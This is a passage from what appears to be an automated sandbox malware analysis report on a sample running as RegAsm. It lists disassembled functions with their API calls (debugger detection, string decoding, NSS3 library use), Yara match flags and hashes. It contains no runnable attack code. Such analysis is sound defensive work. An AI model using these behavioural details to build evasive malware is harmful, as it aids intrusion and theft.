                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                • API String ID: 801438305-4149320968
                                                                                • Opcode ID: c240ca84a0d006e2cb0f716022859979bcf9e2a87431271be4a43677dd110d02
                                                                                • Instruction ID: 53fc9869ea619a2bc6d8bbeff207489bd23a67026cf1083347f15b7b65d20571
                                                                                • Opcode Fuzzy Hash: c240ca84a0d006e2cb0f716022859979bcf9e2a87431271be4a43677dd110d02
                                                                                • Instruction Fuzzy Hash: 1991CE707087448FD734CF28C99969EBBE0AF89358F504D2DE99987750DB34D949CB82
                                                                                Function 0041A8A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsDebuggerPresent.KERNEL32 ref: 0041D65A
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D66F
                                                                                • UnhandledExceptionFilter.KERNEL32(8d), ref: 0041D67A
                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0041D696
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 0041D69D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                • String ID: 8d
                                                                                • API String ID: 2579439406-1695097073
                                                                                • Opcode ID: 15e6bdebef7fdcf6b28e9c671bf7be099d11023623272d234c1b96f7451fb0bd
                                                                                • Instruction ID: da8d185630415dce7ae8405e59be5687771a0259bdeb170e3ca3d49ef6a50cc7
                                                                                • Opcode Fuzzy Hash: 15e6bdebef7fdcf6b28e9c671bf7be099d11023623272d234c1b96f7451fb0bd
                                                                                • Instruction Fuzzy Hash: DB2105BC911320EFE750DF55ED856943BA2FB0A308F50202AEB0887761D7B65581CF0E
                                                                                Function 6C82542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.VCRUNTIME140(?,000000FF,?), ref: 6C8288F0
                                                                                • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C82925C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: ~q{l
                                                                                • API String ID: 2221118986-2002290586
                                                                                • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                • Instruction ID: 27248d47c0850144d5d40836542f58dfb18fadfe582f95e3229642125ac5fb7a
                                                                                • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                • Instruction Fuzzy Hash: 7CB1C572E0020ACFDB24CF58C9856A9B7B2EF95314F180679C949EB785D734A9C9CBD0
                                                                                Function 6C9ECDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9ED086
                                                                                • PR_Malloc.NSS3(00000001), ref: 6C9ED0B9
                                                                                • PR_Free.NSS3(?), ref: 6C9ED138
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: FreeMallocstrlen
                                                                                • String ID: >
                                                                                • API String ID: 1782319670-325317158
                                                                                • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                • Instruction ID: 0c6b0b3aa03ff824dd73c38efb8dec5ae3916756e71c0447e3985e87147c0e8c
                                                                                • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                • Instruction Fuzzy Hash: 2DD16B23B4164A4FEB1A487C88A13E97B978FFF378F580329D5618BBE5E519C9438341
                                                                                Function 0040245C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52encryptionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00402481
                                                                                • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
                                                                                • CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: BinaryCryptString$memset
                                                                                • String ID: UNK
                                                                                • API String ID: 1505698593-448974810
                                                                                • Opcode ID: 307e2a93c1ec34602f4f8329783d4c84d8856f5e9fcd56b171e26a8fa60de6e6
                                                                                • Instruction ID: 3a08a9d548fe4de1239348f4aceeaeed9f578883f8d2c1de915be4d716495e5c
                                                                                • Opcode Fuzzy Hash: 307e2a93c1ec34602f4f8329783d4c84d8856f5e9fcd56b171e26a8fa60de6e6
                                                                                • Instruction Fuzzy Hash: 5B0162F260011C7EE711EB95DE81DFB77ACEB45658F0000ABB704A3181E6F4AE845A78
                                                                                Function 6C98AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6a0b7d83328e5194637de7bd1f2a907b3176ed5dba3c55dfa0cbbff823b4e2ff
                                                                                • Instruction ID: 81e58833c43502a960dce7ce8a0fe64d3b45af81cf5478848404e971d9f3f55b
                                                                                • Opcode Fuzzy Hash: 6a0b7d83328e5194637de7bd1f2a907b3176ed5dba3c55dfa0cbbff823b4e2ff
                                                                                • Instruction Fuzzy Hash: 58F1BD71E062668BDB18CF68CD507B9B7B4AB4A305F198639C905D7B40EB78D993CBC0
                                                                                Function 00410DAC Relevance: 6.1, APIs: 4, Instructions: 53memoryencryptionCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
                                                                                • HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocBinaryCryptProcessString
                                                                                • String ID:
                                                                                • API String ID: 1871034439-0
                                                                                • Opcode ID: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                                • Instruction ID: 533e96b164cb0d967d7948213eb188af149c3bb85dd902e70f95414ccdf186b2
                                                                                • Opcode Fuzzy Hash: ad0991718ef18b2bf8ef03264dcc82093b956574455e5d0286dcdbe0f337aa8f
                                                                                • Instruction Fuzzy Hash: C2016931500209FFDF118FA5EC449EBBBAEFF4A350B104429F90193210D7759C91EB60
                                                                                Function 00406242 Relevance: 6.0, APIs: 4, Instructions: 48encryptionmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                • LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                • LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: BinaryCryptLocalString$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 4291131564-0
                                                                                • Opcode ID: 5e238f24b81681bd1e218dc304b4b0d5aee478eb474be9148ccb694fddff89b6
                                                                                • Instruction ID: 7cbb48460589e96c39e43793b365f6781130aaaa1b7fd363564d70c00da41937
                                                                                • Opcode Fuzzy Hash: 5e238f24b81681bd1e218dc304b4b0d5aee478eb474be9148ccb694fddff89b6
                                                                                • Instruction Fuzzy Hash: BD01E874101234BFDB215F56DC88E8B7FB9EF4ABA0B104455FA09A6250D3719910DBB0
                                                                                Function 6C8C8EA0 Relevance: .1, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0a0ccc931bb147a102704de79cabe08744c19546fb47ace25158734ebb713d1b
                                                                                • Instruction ID: 9ffa7b3c39233fe50c8e3cc34d54951dc81eed77700e15078db423e6a1866a05
                                                                                • Opcode Fuzzy Hash: 0a0ccc931bb147a102704de79cabe08744c19546fb47ace25158734ebb713d1b
                                                                                • Instruction Fuzzy Hash: BC11C432B442158BD728CF24E98475AB7A5FF4231CF088A6AD8058FA41C779D8C6C7D2
                                                                                Function 6C9A0C40 Relevance: .1, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bfa182ea1f560e10bfdbf3248479e597d60d63292e8aa8e606160334484e6e00
                                                                                • Instruction ID: b1c7771f8be17f4a93690b9de614c585d39ed233e2755584d916aa8a97da4526
                                                                                • Opcode Fuzzy Hash: bfa182ea1f560e10bfdbf3248479e597d60d63292e8aa8e606160334484e6e00
                                                                                • Instruction Fuzzy Hash: 1D11C1747043059FCB10DF68C88066A7BB5FF85368F148479D81A8B701EB75E807CBA0
                                                                                Function 6C9A0D60 Relevance: .0, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                • Instruction ID: 8cb830212bb6a7692582e9033ac8739bbf90c7ddfd8638bc41c20a2ce580401f
                                                                                • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                • Instruction Fuzzy Hash: 5EE06D3B202254A7DB148E49C450AAD7359DF81659FA49079CC5AABE01D633F8038781
                                                                                Function 0040E2FF Relevance: 93.4, APIs: 62, Instructions: 416memorystringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040E304
                                                                                  • Part of subcall function 0040E204: _EH_prolog.MSVCRT ref: 0040E209
                                                                                  • Part of subcall function 0040E204: lstrlenA.KERNEL32(?,6CD07FA0,750A5460,00000000), ref: 0040E22D
                                                                                  • Part of subcall function 0040E204: strchr.MSVCRT ref: 0040E23F
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,6CD07FA0,00000000), ref: 0040E353
                                                                                • HeapAlloc.KERNEL32(00000000,?,6CD07FA0,00000000), ref: 0040E35A
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,6CD07FA0,00000000), ref: 0040E36F
                                                                                • HeapFree.KERNEL32(00000000,?,6CD07FA0,00000000), ref: 0040E376
                                                                                • strcpy_s.MSVCRT ref: 0040E3AF
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E3C6
                                                                                • HeapFree.KERNEL32(00000000,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E3CD
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E3F3
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E3FA
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E401
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E408
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E41D
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E424
                                                                                • strcpy_s.MSVCRT ref: 0040E437
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E448
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E44F
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0), ref: 0040E46A
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E471
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0), ref: 0040E478
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E47F
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0), ref: 0040E494
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E49B
                                                                                • strcpy_s.MSVCRT ref: 0040E4AE
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E4BF
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,750A5460), ref: 0040E4C6
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E4E8
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E4EF
                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E4F6
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E4FD
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E515
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E51C
                                                                                • strcpy_s.MSVCRT ref: 0040E52F
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E540
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E547
                                                                                  • Part of subcall function 0040E156: strlen.MSVCRT ref: 0040E16D
                                                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E550
                                                                                • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E560
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E567
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E593
                                                                                • strcpy_s.MSVCRT ref: 0040E5B7
                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,?,00000000), ref: 0040E5E0
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E5E7
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E5EC
                                                                                • GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E5F7
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E5FE
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E60F
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,750A5460,?,6CD07FA0,00000000), ref: 0040E616
                                                                                • strcpy_s.MSVCRT ref: 0040E624
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E630
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,750A5460), ref: 0040E637
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E65D
                                                                                • HeapFree.KERNEL32(00000000), ref: 0040E664
                                                                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040E66B
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0040E672
                                                                                • strcpy_s.MSVCRT ref: 0040E68A
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E69B
                                                                                • HeapFree.KERNEL32(00000000), ref: 0040E6A2
                                                                                • strlen.MSVCRT ref: 0040E6F0
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E734
                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,750A5460), ref: 0040E73B
                                                                                  • Part of subcall function 0040E204: strchr.MSVCRT ref: 0040E263
                                                                                  • Part of subcall function 0040E204: lstrlenA.KERNEL32(?), ref: 0040E281
                                                                                  • Part of subcall function 0040E204: GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040E28E
                                                                                  • Part of subcall function 0040E204: HeapAlloc.KERNEL32(00000000), ref: 0040E295
                                                                                  • Part of subcall function 0040E204: strcpy_s.MSVCRT ref: 0040E2D0
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0040E787
                                                                                • HeapFree.KERNEL32(00000000), ref: 0040E78E
                                                                                Memory Dump Source
